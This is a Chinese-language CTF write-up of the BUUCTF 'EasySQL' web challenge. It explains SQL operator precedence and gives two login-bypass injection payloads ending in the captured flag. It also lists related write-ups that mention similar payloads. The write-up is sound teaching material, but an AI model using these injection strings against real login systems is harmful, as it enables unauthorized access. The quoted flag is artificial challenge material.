BUUCTF Web 极客大挑战 2019 EasySQL

文章目录

BUUCTF Web 极客大挑战 2019 EasySQL
- 1，输入万能密码：
- 2，输入万能账号

首先有点常识：
正常SQL语句这样子写：

select * from user where username= 'XXX' and password = 'XXX'

（当然，我们只是猜测闭合符号是单引号，其他题目也可能是双引号）

优先级：【and】>【=】>【or】

接下来，我们试试用一下万能账号或者密码两种方法（将账号密码带入上面的SQL语句其实就很明显）：

1，输入万能密码：

' or '1'='1

SQL语句变为select * from user where username= '1' and password = '' or '1'='1 '，语句为真，可行，得到flag。

2，输入万能账号

admin' or 1=1 #

（#后面内容注释掉了）
可行，带入上面的SQL语句：select * from user where username= 'admin' or 1=1 #' and password = '1'，也为真，得到flag

flag{278e986b-0fc0-423d-8948-9f87446f9d00}

BUUCTF Web 极客大挑战 2019 EasySQL相关推荐

BUUCTF Web [极客大挑战 2019]EasySQL
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
BUUCTF Web [极客大挑战 2019]Havefun
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
[极客大挑战2019] EasySQL
[强网杯 2019]随便注这题是写给自己看的,记录一下自己sql注入的学习历程,看了别人的博客,总结了一下自己的知识查看大佬操作首先是涉及到的点,因为写过一次,这次是总结知识点 1.堆叠注入该题 ...
【BUUCTF】[极客大挑战 2019]RCE ME
源码 <?php error_reporting(0); if(isset($_GET['code'])){$code=$_GET['code'];if(strlen($code)>40) ...
BUUCTF-WEB：[极客大挑战 2019]EasySQL 1（收藏了URL编码表）
点击链接进入环境发现是一个登录界面我的思路: 第一步.测试注入点(tips:利用单引号,and 1=1, or 1=1之类的,%23为#注释符的url编码)判断是字符型还是数字型 payload:u ...
[极客大挑战 2019]EasySQL
用户名密码,尝试万能密码. 'or 1=1 # 随便密码获得flag 一个万能密码的参考:万能密码
【BUUCTF】[极客大挑战 2019]Havefun 1
主要考察对源代码的理解 1.进入网站 2.发现网页并没有什么有用的提示,观察源代码发现可能有用的判别语句 3.尝试输入?cat=dog
BUUCTF：[极客大挑战 2019]RCE ME
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编 ...

BUUCTF Web 极客大挑战 2019 EasySQL

BUUCTF Web 极客大挑战 2019 EasySQL

文章目录

1，输入万能密码：

2，输入万能账号

BUUCTF Web 极客大挑战 2019 EasySQL相关推荐

最新文章

热门文章